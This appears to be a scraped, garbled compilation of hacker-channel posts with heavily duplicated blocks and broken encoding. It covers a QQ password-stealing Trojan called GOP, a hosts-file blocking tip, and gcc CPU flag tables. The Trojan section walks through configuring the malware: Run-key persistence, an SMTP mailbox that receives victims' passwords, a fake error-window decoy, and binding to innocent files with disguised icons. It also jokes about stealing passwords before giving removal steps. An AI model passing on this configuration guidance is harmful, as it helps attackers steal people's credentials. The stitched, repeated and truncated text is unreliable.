2) After downloading and unzipping the latest version of GOP, there are 3 executable files plus a description file, and an accompanying icon. Among them, gop.exe is the server (don't run it on your computer!), Editgop.exe is the server editor, and gopslit.exe is a tool to organize the sending records. The configuration of GOP is divided into four parts.
π¦ General settings
1) Copy to the definition directory: one of four categories: directory, directory, directory and source directory can be selected in the drop-down menu. This is where the Trojan hides.
2) Delete the source file after running: the act of adding extravagance, even the author himself recommends not to choose it. (Who does nβt know that the thing that disappeared inexplicably after running is the Trojan, if this happens, hey, be careful!)
3) Service file name: it is the name of the Trojan, you can change any name, it is not easy to be found.
4) Define the registry key name: Once the Trojan has been run, it will add the Trojan key under the HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun primary key in the registry, so that the Trojan can run automatically every time it is turned on in the future.
5) When the number of records exceeds XX, the cleanup starts: when the number of records in the GOP record file reaches this XX value, the records are automatically cleared.
π¦Mail settings
1) SMTP: Set the mail sending server. Do you know what this is for? When you go online, GOP will send your OICQ password to the Internet through this mail server!
2) Mailbox: This is the mailbox account used by hackers to send mail. Most domestic free2 mailbox providers restrict the SMTP server, so you need to set up a legal mail account to send letters.
3) Receive mailbox: The mailbox that receives the password record document sent by GOP, the final destination of the victim's password.
4) Check interval (seconds): Set the time interval for GOP check record files. If the record has been updated and online at the time of inspection, the record will be sent immediately.
π¦Deception window
1) (I think the Trojan is very powerful) You can choose whether to pop up a spoof window when running GOP for the first time. For example, define a deceit window with the title "Warning", the content "Insufficient memory!" And the icon "Exclamation Point". In this way, when someone else runs the Trojan for the first time, the defined window will pop up, so the Trojan has been implanted into the computer without knowing it.
2) File binding
The Trojan comes with a file binding tool, which is really scary. The following are its important options:
3) Host file: The hacker can find a small animation or small program on the Internet, and use it as a "parasitic" target.
4) File icon: If a hacker finds an icon that is the same as a system tool, ordinary people are afraid to delete it. In this way, knowing that there is a Trojan can not be removed in time.
(Okay, with GOP, everyone can safely steal someone βs OICQ password, hahaha ... ah! Black! "The author crawled out of the garbage dump." Ah? That's the case, why didn't you say it early. ")
Let's talk about how to deal with this Trojan. Because it's very new, don't just open things from others. This is a very risky behavior, this is by no means alarmist!
π¦Trojan inspection
1) When the Trojan is running, it is not visible in the Windows task window. Don't believe the Windows task window-this is my second advice.
π¦In-depth analysis of how hackers steal QQ :
t.me/UndercodeTesting
If you provoke it, the OICQ password may be leaked before you know it. Even more frightening is that it will send the password to the Internet, so hackers don't have to work hard on your machine. The thing that the hacking team will introduce today is GOP (Get Oicq Password).
1) First, analyze the use settings of the Trojan
As the saying goes, "Know yourselves and know each other, you can't fight a hundred battles." To prevent GOP attacks, you must first understand its operating mechanism.
2) After downloading and unzipping the latest version of GOP, there are 3 executable files plus a description file, and an accompanying icon. Among them, gop.exe is the server (don't run it on your computer!), Editgop.exe is the server editor, and gopslit.exe is a tool to organize the sending records. The configuration of GOP is divided into four parts.
π¦ General settings
1) Copy to the definition directory: one of four categories: directory, directory, directory and source directory can be selected in the drop-down menu. This is where the Trojan hides.
2) Delete the source file after running: the act of adding extravagance, even the author himself recommends not to choose it. (Who does nβt know that the thing that disappeared inexplicably after running is the Trojan, if this happens, hey, be careful!)
3) Service file name: it is the name of the Trojan, you can change any name, it is not easy to be found.
4) Define the registry key name: Once the Trojan has been run, it will add the Trojan key under the HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun primary key in the registry, so that the Trojan can run automatically every time it is turned on in the future.
5) When the number of records exceeds XX, the cleanup starts: when the number of records in the GOP record file reaches this XX value, the records are automatically cleared.
π¦Mail settings
1) SMTP: Set the mail sending server. Do you know what this is for? When you go online, GOP will send your OICQ password to the Internet through this mail server!
2) Mailbox: This is the mailbox account used by hackers to send mail. Most domestic free2 mailbox providers restrict the SMTP server, so you need to set up a legal mail account to send letters.
3) Receive mailbox: The mailbox that receives the password record document sent by GOP, the final destination of the victim's password.
4) Check interval (seconds): Set the time interval for GOP check record files. If the record has been updated and online at the time of inspection, the record will be sent immediately.
π¦Deception window
1) (I think the Trojan is very powerful) You can choose whether to pop up a spoof window when running GOP for the first time. For example, define a deceit window with the title "Warning", the content "Insufficient memory!" And the icon "Exclamation Point". In this way, when someone else runs the Trojan for the first time, the defined window will pop up, so the Trojan has been implanted into the computer without knowing it.
2) File binding
The Trojan comes with a file binding tool, which is really scary. The following are its important options:
3) Host file: The hacker can find a small animation or small program on the Internet, and use it as a "parasitic" target.
4) File icon: If a hacker finds an icon that is the same as a system tool, ordinary people are afraid to delete it. In this way, knowing that there is a Trojan can not be removed in time.
(Okay, with GOP, everyone can safely steal someone βs OICQ password, hahaha ... ah! Black! "The author crawled out of the garbage dump." Ah? That's the case, why didn't you say it early. ")
Let's talk about how to deal with this Trojan. Because it's very new, don't just open things from others. This is a very risky behavior, this is by no means alarmist!
π¦Trojan inspection
1) When the Trojan is running, it is not visible in the Windows task window. Don't believe the Windows task window-this is my second advice.
2) Click "Start", "Run", "msinfo32" on the task bar (the system information that comes with Windows, in "Accessories"). Look at the software environment β running tasks. This is the task that Windows runs all now. When you think something is wrong after running something, take a look here. If a project has a program name and path, but no version, manufacturer, and description, you should be nervous.
3) Turn off your cat first (off the network), and then log in to your OICQ again offline to find whether there is a record.dat file on your computer (this is the document that the GOP records the OICQ password. If your OICQ password is monitored, it must be Yes, of course, even if you hit the Trojan, this file will not be available when you have not used OICQ. Anyway, you are not online now, don't worry about the password being sent away) If so, then "congratulations" you, 100% hit the Trojan. Do not believe? Open the record.dat with notepad and see if there is your baby OICQ number and password.
4) Third, the removal of the Trojan
Fortunately, so far most of the Trojans have added a key value under the HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun primary key of the registry to let the Trojan run automatically, and the Trojan is no exception. Run regedit, enter the HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun primary key, remember that the file found in the system information (in "Analysis of Trojan Settings", we know that the Trojan file name can be customized arbitrarily,
5) so the specific file name cannot be determined) Path, delete the key. Then shut down the computer and wait for a while to start the computer (note: do not choose to restart). Then enter the file storage path and delete the Trojan file.
WRITTEN BY UNDERCODE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
3) Turn off your cat first (off the network), and then log in to your OICQ again offline to find whether there is a record.dat file on your computer (this is the document that the GOP records the OICQ password. If your OICQ password is monitored, it must be Yes, of course, even if you hit the Trojan, this file will not be available when you have not used OICQ. Anyway, you are not online now, don't worry about the password being sent away) If so, then "congratulations" you, 100% hit the Trojan. Do not believe? Open the record.dat with notepad and see if there is your baby OICQ number and password.
4) Third, the removal of the Trojan
Fortunately, so far most of the Trojans have added a key value under the HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun primary key of the registry to let the Trojan run automatically, and the Trojan is no exception. Run regedit, enter the HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun primary key, remember that the file found in the system information (in "Analysis of Trojan Settings", we know that the Trojan file name can be customized arbitrarily,
5) so the specific file name cannot be determined) Path, delete the key. Then shut down the computer and wait for a while to start the computer (note: do not choose to restart). Then enter the file storage path and delete the Trojan file.
WRITTEN BY UNDERCODE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Hosts file to prevent QQ virus
t.me/UndercodeTesting
> Recently, the QQ virus is very rampant. Such viruses mainly send malicious website addresses that can infect the virus through QQ.
π¦ So, how to prevent access to those known malicious websites due to misuse? Here the hacker team introduces a simple and effective prevention method-using the Hosts file to prevent accidental access to malicious websites!
1) analysis
When we use a domain name to access a website, the DNS server in the network will interpret the domain name as the corresponding IP address. If the domain name of a malicious website is disturbed before it is interpreted as the corresponding IP address, will it not achieve our purpose?
2) Solution
The Hosts file can help us realize this vision. Take the Win98 system as an example, the Hosts file is located in the "C: \ Windows" directory, it can be viewed as a DNS system of the machine, and its priority is higher than the DNS server in the network. We can open it with Notepad and you will see instructions for using the Hosts file. For example, we can write the following line:
>After saving 127.0.0.1 www.test.com , run it in the MS-DOS window:
> ping www.test.com
> What do you see? Yes! The system interprets the domain name www.test.com as 127.0.0.1 (local IP), which is exactly the effect we want! Of course, we can also specify it as a website we often visit IP address. Now do you understand? We can explain all the domain names of known malicious websites to the IP address of the machine, namely: 127.0.0.1. After this setting, when we visit a malicious website by mistake, Hosts will interpret the domain name as the address of the machine, so as to prevent the malicious entry of the malicious website. After the author writes a few example website addresses (for example, not real URLs) into the Hosts file, when you visit these URLs, you will directly access 127.0.0.1:
>127.0.0.1 www.123.com
127.0.0.1 321.123.com
127.0.0.1 213.123.com
127.0.0.1 321.123.com
> Note: The file name of the Hosts file is Hosts.sam by default. You must remove the extension .sam after modification, otherwise it will be invalid.
> After saving the Hosts file, try to refresh the system as many times as possible.
WRITTEN BY UNDERCODE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Hosts file to prevent QQ virus
t.me/UndercodeTesting
> Recently, the QQ virus is very rampant. Such viruses mainly send malicious website addresses that can infect the virus through QQ.
π¦ So, how to prevent access to those known malicious websites due to misuse? Here the hacker team introduces a simple and effective prevention method-using the Hosts file to prevent accidental access to malicious websites!
1) analysis
When we use a domain name to access a website, the DNS server in the network will interpret the domain name as the corresponding IP address. If the domain name of a malicious website is disturbed before it is interpreted as the corresponding IP address, will it not achieve our purpose?
2) Solution
The Hosts file can help us realize this vision. Take the Win98 system as an example, the Hosts file is located in the "C: \ Windows" directory, it can be viewed as a DNS system of the machine, and its priority is higher than the DNS server in the network. We can open it with Notepad and you will see instructions for using the Hosts file. For example, we can write the following line:
>After saving 127.0.0.1 www.test.com , run it in the MS-DOS window:
> ping www.test.com
> What do you see? Yes! The system interprets the domain name www.test.com as 127.0.0.1 (local IP), which is exactly the effect we want! Of course, we can also specify it as a website we often visit IP address. Now do you understand? We can explain all the domain names of known malicious websites to the IP address of the machine, namely: 127.0.0.1. After this setting, when we visit a malicious website by mistake, Hosts will interpret the domain name as the address of the machine, so as to prevent the malicious entry of the malicious website. After the author writes a few example website addresses (for example, not real URLs) into the Hosts file, when you visit these URLs, you will directly access 127.0.0.1:
>127.0.0.1 www.123.com
127.0.0.1 321.123.com
127.0.0.1 213.123.com
127.0.0.1 321.123.com
> Note: The file name of the Hosts file is Hosts.sam by default. You must remove the extension .sam after modification, otherwise it will be invalid.
> After saving the Hosts file, try to refresh the system as many times as possible.
WRITTEN BY UNDERCODE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Programming
> technology-best compilation parameters for different CPUs by undercode
t.me/undercodeTesting
π¦ππΌπ'π πππΈβπ :
> gcc has different compilation effects under different architectures / CPUs, and you need to use different Compile parameters to achieve the best results.
1. Version 1.2 (gcc version 2.9.x)
-pipe -fomit-frame-pointer "
CXXFLAGS ="-march = i486 -O3 -pipe -fomit-frame-pointer "
Pentium, Pentium MMX +, Celeron (Mendocino) (Intel)
CHOST = "i586-pc-linux-gnu"
CFLAGS = "-march = pentium -O3 -pipe -fomit-frame-pointer"
CXXFLAGS = "-march = pentium -O3 -pipe -fomit-frame-pointer"
Pentium Pro / II / III / 4, Celeron (Coppermine), Celeron (Willamette?) (Intel)
CHOST = "i686-pc-linux-gnu"
CFLAGS = "-march = i686 -O3 -pipe -fomit-frame-pointer"
CXXFLAGS = "
CHOST="i586-pc-linux-gnu"
CFLAGS="-march=i586 -O3 -pipe -fomit-frame-pointer"
CXXFLAGS="-march=i586 -O3 -pipe -fomit-frame-pointer"
Quote : I did the original gentoo install using 1.2, with gcc 2.95 using -march=i586. i686 won't work.
K6 or beyond (AMD)
CHOST="i586-pc-linux-gnu"
CFLAGS="-march=k6 -O3 -pipe -fomit-frame-pointer"
CXXFLAGS="-march=k6 -O3 -pipe -fomit-frame-pointer"
(A Duron will report "Athlon" in its /proc/cpuinfo)
Athlon (AMD)
CHOST="i686-pc-linux-gnu"
CFLAGS="-march=k6 -O3 -pipe -fomit-frame-pointer"
CXXFLAGS="-march=k6 -O3 -pipe -fomit-frame-pointer"
For the following, i don't know of any flag that enhance performances..., do you ?
PowerPC
CHOST="powerpc-unknown-linux-gnu"
CFLAGS="-O3 -pipe -fomit-frame-pointer"
CXXFLAGS="-O3 -pipe -fomit-frame-pointer"
Sparc
CHOST="sparc-unknown-linux-gnu"
CFLAGS="-O3 -pipe -fomit-frame-pointer"
CXXFLAGS="-O3 -pipe -fomit-frame-pointer"
Sparc 64
CHOST="sparc64-unknown-linux-gnu"
CFLAGS="-O3 -pipe -fomit-frame-pointer"
CXXFLAGS="-O3 -pipe -fomit-frame-pointer"
δΊγ1.4η(gcc 3.xη):
i386 (Intel), do you really want to install gentoo on that ?
CHOST="i386-pc-linux-gnu"
CFLAGS="-march=i386 -O3 -pipe -fomit-frame-pointer"
CXXFLAGS="-march=i386 -O3 -pipe -fomit-frame-pointer"
i486 (Intel), do you really want to install gentoo on that ?
CHOST="i486-pc-linux-gnu"
CFLAGS="-march=i486 -O3 -pipe -fomit-frame-pointer"
CXXFLAGS="-march=i486 -O3 -pipe -fomit-frame-pointer"
Pentium 1 (Intel)
CHOST="i586-pc-linux-gnu"
CFLAGS="-march=pentium -O3 -pipe -fomit-frame-pointer"
CXXFLAGS="-march=pentium -O3 -pipe -fomit-frame-pointer"
Pentium MMX (Intel)
CHOST="i586-pc-linux-gnu"
CFLAGS="-march=pentium-mmx -O3 -pipe -fomit-frame-pointer"
CXXFLAGS="-march=pentium-mmx -O3 -pipe -fomit-frame-pointer"
Pentium PRO (Intel)
CHOST="i686-pc-linux-gnu"
CFLAGS="-march=pentiumpro -O3 -pipe -fomit-frame-pointer"
CXXFLAGS="-march=pentiumpro -O3 -pipe -fomit-frame-pointer"
Pentium II (Intel)
CHOST="i686-pc-linux-gnu"
CFLAGS="-march=pentium2 -O3 -pipe -fomit-frame-pointer"
CXXFLAGS="-march=pentium2 -O3 -pipe -fomit-frame-pointer"
Celeron (Mendocino), aka Celeron1 (Intel)
CHOST="i686-pc-linux-gnu"
CFLAGS="-march=pentium2 -O3 -pipe -fomit-frame-pointer"
CXXFLAGS="-march=pentium2 -O3 -pipe -fomit-frame-pointer"
Pentium III (Intel)
CHOST="i686-pc-linux-gnu"
CFLAGS="-march=pentium3 -O3 -pipe -fomit-frame-pointer"
CXXFLAGS="-march=pentium3 -O3 -pipe -fomit-frame-pointer"
Celeron (Coppermine) aka Celeron2 (Intel)
CHOST="i686-pc-linux-gnu"
CFLAGS="-march=pentium3 -O3 -pipe -fomit-frame-pointer"
CXXFLAGS="-march=pentium3 -O3 -pipe -fomit-frame-pointer"
Celeron (Willamette?) (Intel)
CHOST="i686-pc-linux-gnu"
CFLAGS="-march=pentium4 -O3 -pipe -fomit-frame-pointer"
CXXFLAGS="-march=pentium4 -O3 -pipe -fomit-frame-pointer"
Pentium 4 (Intel)
CHOST="i686-pc-linux-gnu"
CFLAGS="-march=pentium4 -O3 -pipe -fomit-frame-pointer"
CXXFLAGS="-march=pentium4 -O3 -pipe -fomit-frame-pointer"
Eden C3/Ezra (Via)
CHOST="i586-pc-linux-gnu"
CFLAGS="-march=i586 -m3dnow -O3 -pipe -fomit-frame-pointer"
CXXFLAGS="-march=i586 -m3dnow -O3 -pipe -fomit-frame-pointer"
quote : the ezra doesn't have any special instructions that you could optimize for, just consider is a K6-3...basically
a p2 with 3dnow
π¦Programming
> technology-best compilation parameters for different CPUs by undercode
t.me/undercodeTesting
π¦ππΌπ'π πππΈβπ :
> gcc has different compilation effects under different architectures / CPUs, and you need to use different Compile parameters to achieve the best results.
1. Version 1.2 (gcc version 2.9.x)
-pipe -fomit-frame-pointer "
CXXFLAGS ="-march = i486 -O3 -pipe -fomit-frame-pointer "
Pentium, Pentium MMX +, Celeron (Mendocino) (Intel)
CHOST = "i586-pc-linux-gnu"
CFLAGS = "-march = pentium -O3 -pipe -fomit-frame-pointer"
CXXFLAGS = "-march = pentium -O3 -pipe -fomit-frame-pointer"
Pentium Pro / II / III / 4, Celeron (Coppermine), Celeron (Willamette?) (Intel)
CHOST = "i686-pc-linux-gnu"
CFLAGS = "-march = i686 -O3 -pipe -fomit-frame-pointer"
CXXFLAGS = "
CHOST="i586-pc-linux-gnu"
CFLAGS="-march=i586 -O3 -pipe -fomit-frame-pointer"
CXXFLAGS="-march=i586 -O3 -pipe -fomit-frame-pointer"
Quote : I did the original gentoo install using 1.2, with gcc 2.95 using -march=i586. i686 won't work.
K6 or beyond (AMD)
CHOST="i586-pc-linux-gnu"
CFLAGS="-march=k6 -O3 -pipe -fomit-frame-pointer"
CXXFLAGS="-march=k6 -O3 -pipe -fomit-frame-pointer"
(A Duron will report "Athlon" in its /proc/cpuinfo)
Athlon (AMD)
CHOST="i686-pc-linux-gnu"
CFLAGS="-march=k6 -O3 -pipe -fomit-frame-pointer"
CXXFLAGS="-march=k6 -O3 -pipe -fomit-frame-pointer"
For the following, i don't know of any flag that enhance performances..., do you ?
PowerPC
CHOST="powerpc-unknown-linux-gnu"
CFLAGS="-O3 -pipe -fomit-frame-pointer"
CXXFLAGS="-O3 -pipe -fomit-frame-pointer"
Sparc
CHOST="sparc-unknown-linux-gnu"
CFLAGS="-O3 -pipe -fomit-frame-pointer"
CXXFLAGS="-O3 -pipe -fomit-frame-pointer"
Sparc 64
CHOST="sparc64-unknown-linux-gnu"
CFLAGS="-O3 -pipe -fomit-frame-pointer"
CXXFLAGS="-O3 -pipe -fomit-frame-pointer"
δΊγ1.4η(gcc 3.xη):
i386 (Intel), do you really want to install gentoo on that ?
CHOST="i386-pc-linux-gnu"
CFLAGS="-march=i386 -O3 -pipe -fomit-frame-pointer"
CXXFLAGS="-march=i386 -O3 -pipe -fomit-frame-pointer"
i486 (Intel), do you really want to install gentoo on that ?
CHOST="i486-pc-linux-gnu"
CFLAGS="-march=i486 -O3 -pipe -fomit-frame-pointer"
CXXFLAGS="-march=i486 -O3 -pipe -fomit-frame-pointer"
Pentium 1 (Intel)
CHOST="i586-pc-linux-gnu"
CFLAGS="-march=pentium -O3 -pipe -fomit-frame-pointer"
CXXFLAGS="-march=pentium -O3 -pipe -fomit-frame-pointer"
Pentium MMX (Intel)
CHOST="i586-pc-linux-gnu"
CFLAGS="-march=pentium-mmx -O3 -pipe -fomit-frame-pointer"
CXXFLAGS="-march=pentium-mmx -O3 -pipe -fomit-frame-pointer"
Pentium PRO (Intel)
CHOST="i686-pc-linux-gnu"
CFLAGS="-march=pentiumpro -O3 -pipe -fomit-frame-pointer"
CXXFLAGS="-march=pentiumpro -O3 -pipe -fomit-frame-pointer"
Pentium II (Intel)
CHOST="i686-pc-linux-gnu"
CFLAGS="-march=pentium2 -O3 -pipe -fomit-frame-pointer"
CXXFLAGS="-march=pentium2 -O3 -pipe -fomit-frame-pointer"
Celeron (Mendocino), aka Celeron1 (Intel)
CHOST="i686-pc-linux-gnu"
CFLAGS="-march=pentium2 -O3 -pipe -fomit-frame-pointer"
CXXFLAGS="-march=pentium2 -O3 -pipe -fomit-frame-pointer"
Pentium III (Intel)
CHOST="i686-pc-linux-gnu"
CFLAGS="-march=pentium3 -O3 -pipe -fomit-frame-pointer"
CXXFLAGS="-march=pentium3 -O3 -pipe -fomit-frame-pointer"
Celeron (Coppermine) aka Celeron2 (Intel)
CHOST="i686-pc-linux-gnu"
CFLAGS="-march=pentium3 -O3 -pipe -fomit-frame-pointer"
CXXFLAGS="-march=pentium3 -O3 -pipe -fomit-frame-pointer"
Celeron (Willamette?) (Intel)
CHOST="i686-pc-linux-gnu"
CFLAGS="-march=pentium4 -O3 -pipe -fomit-frame-pointer"
CXXFLAGS="-march=pentium4 -O3 -pipe -fomit-frame-pointer"
Pentium 4 (Intel)
CHOST="i686-pc-linux-gnu"
CFLAGS="-march=pentium4 -O3 -pipe -fomit-frame-pointer"
CXXFLAGS="-march=pentium4 -O3 -pipe -fomit-frame-pointer"
Eden C3/Ezra (Via)
CHOST="i586-pc-linux-gnu"
CFLAGS="-march=i586 -m3dnow -O3 -pipe -fomit-frame-pointer"
CXXFLAGS="-march=i586 -m3dnow -O3 -pipe -fomit-frame-pointer"
quote : the ezra doesn't have any special instructions that you could optimize for, just consider is a K6-3...basically
a p2 with 3dnow
K6 (AMD)
CHOST="i586-pc-linux-gnu"
CFLAGS="-march=k6 -O3 -pipe -fomit-frame-pointer"
CXXFLAGS="-march=k6 -O3 -pipe -fomit-frame-pointer"
K6-2 (AMD)
CHOST="i586-pc-linux-gnu"
CFLAGS="-march=k6-2 -O3 -pipe -fomit-frame-pointer"
CXXFLAGS="-march=k6-2 -O3 -pipe -fomit-frame-pointer"
K6-3 (AMD)
CHOST="i586-pc-linux-gnu"
CFLAGS="-march=k6-3 -O3 -pipe -fomit-frame-pointer"
CXXFLAGS="-march=k6-3 -O3 -pipe -fomit-frame-pointer"
Athlon (AMD)
CHOST="i686-pc-linux-gnu"
CFLAGS="-march=athlon -O3 -pipe -fomit-frame-pointer"
CXXFLAGS="-march=athlon -O3 -pipe -fomit-frame-pointer"
Athlon-tbird, aka K7 (AMD)
CHOST="i686-pc-linux-gnu"
CFLAGS="-march=athlon-tbird -O3 -pipe -fomit-frame-pointer"
CXXFLAGS="-march=athlon-tbird -O3 -pipe -fomit-frame-pointer"
Athlon-tbird XP (AMD)
CHOST="i686-pc-linux-gnu"
CFLAGS="-march=athlon-xp -O3 -pipe -fomit-frame-pointer"
CXXFLAGS="-march=athlon-xp -O3 -pipe -fomit-frame-pointer"
Athlon 4(AMD)
CHOST="i686-pc-linux-gnu"
CFLAGS="-march=athlon-4 -O3 -pipe -fomit-frame-pointer"
CXXFLAGS="-march=athlon-4 -O3 -pipe -fomit-frame-pointer"
Athlon XP (AMD)
CHOST="i686-pc-linux-gnu"
CFLAGS="-march=athlon-xp -O3 -pipe -fomit-frame-pointer"
CXXFLAGS="-march=athlon-xp -O3 -pipe -fomit-frame-pointer"
Athlon MP (AMD)
CHOST="i686-pc-linux-gnu"
CFLAGS="-march=athlon-mp -O3 -pipe -fomit-frame-pointer"
CXXFLAGS="-march=athlon-mp -O3 -pipe -fomit-frame-pointer"
603 (PowerPC)
CHOST="powerpc-unknown-linux-gnu"
CFLAGS="-O3 -pipe -fomit-frame-pointer -fsigned-char"
CXXFLAGS="-O3 -pipe -fomit-frame-pointer -fsigned-char"
603e (PowerPC)
CHOST="powerpc-unknown-linux-gnu"
CFLAGS="-O3 -pipe -fomit-frame-pointer -fsigned-char"
CXXFLAGS="-O3 -pipe -fomit-frame-pointer -fsigned-char"
604 (PowerPC)
CHOST="powerpc-unknown-linux-gnu"
CFLAGS="-O3 -pipe -fomit-frame-pointer -fsigned-char"
CXXFLAGS="-O3 -pipe -fomit-frame-pointer -fsigned-char"
604e (PowerPC)
CHOST="powerpc-unknown-linux-gnu"
CFLAGS="-O3 -pipe -fomit-frame-pointer -fsigned-char"
CXXFLAGS="-O3 -pipe -fomit-frame-pointer -fsigned-char"
750 aka as G3 (PowerPC)
CHOST="powerpc-unknown-linux-gnu"
CFLAGS="-mcpu=750 -O3 -pipe -fomit-frame-pointer
-fsigned-char"
CXXFLAGS="-mcpu=750 -O3 -pipe -fomit-frame-pointer
-fsigned-char"
Note: do not use -march=
7400, aka G4 (PowerPC)
CHOST="powerpc-unknown-linux-gnu"
CFLAGS="-mcpu=7400 -O3 -pipe -fomit-frame-pointer
-fsigned-char -maltivec"
CXXFLAGS="-mcpu=7400 -O3 -pipe -fomit-frame-pointer
-fsigned-char -maltivec"
Note: do not use -march=
7450, aka G4 second generation (PowerPC)
CHOST="powerpc-unknown-linux-gnu"
CFLAGS="-mcpu=7450 -O3 -pipe -fomit-frame-pointer
-fsigned-char -maltivec"
CXXFLAGS="-mcpu=7450 -O3 -pipe -fomit-frame-pointer
-fsigned-char -maltivec"
Note: do not use -march=
PowerPC (If you don't know which one)
CHOST="powerpc-unknown-linux-gnu"
CFLAGS="-O3 -pipe -fomit-frame-pointer -fsigned-char"
CXXFLAGS="-O3 -pipe -fomit-frame-pointer -fsigned-char"
Sparc
CHOST="sparc-unknown-linux-gnu"
CFLAGS="-O3 -pipe -fomit-frame-pointer"
CXXFLAGS="-O3 -pipe -fomit-frame-pointer"
Sparc 64
CHOST="sparc64-unknown-linux-gnu"
CFLAGS="-O3 -pipe -fomit-frame-pointer"
CXXFLAGS="-O3 -pipe -fomit-frame-pointer"
WRITTEN BY UNDERCODE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
CHOST="i586-pc-linux-gnu"
CFLAGS="-march=k6 -O3 -pipe -fomit-frame-pointer"
CXXFLAGS="-march=k6 -O3 -pipe -fomit-frame-pointer"
K6-2 (AMD)
CHOST="i586-pc-linux-gnu"
CFLAGS="-march=k6-2 -O3 -pipe -fomit-frame-pointer"
CXXFLAGS="-march=k6-2 -O3 -pipe -fomit-frame-pointer"
K6-3 (AMD)
CHOST="i586-pc-linux-gnu"
CFLAGS="-march=k6-3 -O3 -pipe -fomit-frame-pointer"
CXXFLAGS="-march=k6-3 -O3 -pipe -fomit-frame-pointer"
Athlon (AMD)
CHOST="i686-pc-linux-gnu"
CFLAGS="-march=athlon -O3 -pipe -fomit-frame-pointer"
CXXFLAGS="-march=athlon -O3 -pipe -fomit-frame-pointer"
Athlon-tbird, aka K7 (AMD)
CHOST="i686-pc-linux-gnu"
CFLAGS="-march=athlon-tbird -O3 -pipe -fomit-frame-pointer"
CXXFLAGS="-march=athlon-tbird -O3 -pipe -fomit-frame-pointer"
Athlon-tbird XP (AMD)
CHOST="i686-pc-linux-gnu"
CFLAGS="-march=athlon-xp -O3 -pipe -fomit-frame-pointer"
CXXFLAGS="-march=athlon-xp -O3 -pipe -fomit-frame-pointer"
Athlon 4(AMD)
CHOST="i686-pc-linux-gnu"
CFLAGS="-march=athlon-4 -O3 -pipe -fomit-frame-pointer"
CXXFLAGS="-march=athlon-4 -O3 -pipe -fomit-frame-pointer"
Athlon XP (AMD)
CHOST="i686-pc-linux-gnu"
CFLAGS="-march=athlon-xp -O3 -pipe -fomit-frame-pointer"
CXXFLAGS="-march=athlon-xp -O3 -pipe -fomit-frame-pointer"
Athlon MP (AMD)
CHOST="i686-pc-linux-gnu"
CFLAGS="-march=athlon-mp -O3 -pipe -fomit-frame-pointer"
CXXFLAGS="-march=athlon-mp -O3 -pipe -fomit-frame-pointer"
603 (PowerPC)
CHOST="powerpc-unknown-linux-gnu"
CFLAGS="-O3 -pipe -fomit-frame-pointer -fsigned-char"
CXXFLAGS="-O3 -pipe -fomit-frame-pointer -fsigned-char"
603e (PowerPC)
CHOST="powerpc-unknown-linux-gnu"
CFLAGS="-O3 -pipe -fomit-frame-pointer -fsigned-char"
CXXFLAGS="-O3 -pipe -fomit-frame-pointer -fsigned-char"
604 (PowerPC)
CHOST="powerpc-unknown-linux-gnu"
CFLAGS="-O3 -pipe -fomit-frame-pointer -fsigned-char"
CXXFLAGS="-O3 -pipe -fomit-frame-pointer -fsigned-char"
604e (PowerPC)
CHOST="powerpc-unknown-linux-gnu"
CFLAGS="-O3 -pipe -fomit-frame-pointer -fsigned-char"
CXXFLAGS="-O3 -pipe -fomit-frame-pointer -fsigned-char"
750 aka as G3 (PowerPC)
CHOST="powerpc-unknown-linux-gnu"
CFLAGS="-mcpu=750 -O3 -pipe -fomit-frame-pointer
-fsigned-char"
CXXFLAGS="-mcpu=750 -O3 -pipe -fomit-frame-pointer
-fsigned-char"
Note: do not use -march=
7400, aka G4 (PowerPC)
CHOST="powerpc-unknown-linux-gnu"
CFLAGS="-mcpu=7400 -O3 -pipe -fomit-frame-pointer
-fsigned-char -maltivec"
CXXFLAGS="-mcpu=7400 -O3 -pipe -fomit-frame-pointer
-fsigned-char -maltivec"
Note: do not use -march=
7450, aka G4 second generation (PowerPC)
CHOST="powerpc-unknown-linux-gnu"
CFLAGS="-mcpu=7450 -O3 -pipe -fomit-frame-pointer
-fsigned-char -maltivec"
CXXFLAGS="-mcpu=7450 -O3 -pipe -fomit-frame-pointer
-fsigned-char -maltivec"
Note: do not use -march=
PowerPC (If you don't know which one)
CHOST="powerpc-unknown-linux-gnu"
CFLAGS="-O3 -pipe -fomit-frame-pointer -fsigned-char"
CXXFLAGS="-O3 -pipe -fomit-frame-pointer -fsigned-char"
Sparc
CHOST="sparc-unknown-linux-gnu"
CFLAGS="-O3 -pipe -fomit-frame-pointer"
CXXFLAGS="-O3 -pipe -fomit-frame-pointer"
Sparc 64
CHOST="sparc64-unknown-linux-gnu"
CFLAGS="-O3 -pipe -fomit-frame-pointer"
CXXFLAGS="-O3 -pipe -fomit-frame-pointer"
WRITTEN BY UNDERCODE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β